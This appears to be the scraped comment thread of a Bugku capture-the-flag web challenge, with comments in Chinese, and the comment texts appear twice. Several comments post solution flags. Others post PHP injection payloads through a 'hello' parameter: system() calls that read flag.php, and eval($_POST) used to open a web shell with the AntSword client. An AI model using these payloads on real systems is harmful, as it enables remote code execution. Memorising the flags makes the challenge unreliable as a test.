flag{28e1ac3a46a1e43e8625174b73101e71}
flag{b881b4f52f1dc5ec52571163ae329179}反引号绕过
flag{200ac814dcbbd84463376267cf14987d}
flag{771f65b0a99e6ebb383759a6d4e34c8a}
?hello=system('tac flag.php')
flag{f4d485c5daacaa827eb500bb44aa4214}
/?hello=eval($_POST['attack']) 蚁剑连接 找到flag.php文件中找到flag或/?hello=highlight_file(flag.php)直接在网页中查看flag
?hello=eval($_POST["cmd"])然后用蚁剑连,密码cmd
?hello=new Exception(system('cat flag.php'))
https://blog.csdn.net/guanrongl/article/details/142799641
...
评论
bugku111rao 2小时前
举报
flag{28e1ac3a46a1e43e8625174b73101e71}
Zhumeng 5小时前
举报
flag{b881b4f52f1dc5ec52571163ae329179}反引号绕过
33555 8天前
举报
flag{200ac814dcbbd84463376267cf14987d}
Wang_Micro 13天前
举报
flag{771f65b0a99e6ebb383759a6d4e34c8a}
Rmgcc 25天前
举报
?hello=system('tac flag.php')
迷茫的三千面 26天前
举报
flag{f4d485c5daacaa827eb500bb44aa4214}
Pearpeach1 28天前
举报
/?hello=eval($_POST['attack']) 蚁剑连接 找到flag.php文件中找到flag或/?hello=highlight_file(flag.php)直接在网页中查看flag
星空 29天前
举报
?hello=eval($_POST["cmd"])然后用蚁剑连,密码cmd
springCloud 1月前
举报
?hello=new Exception(system('cat flag.php'))
小白帽来挖个漏洞 1月前
举报
https://blog.csdn.net/guanrongl/article/details/142799641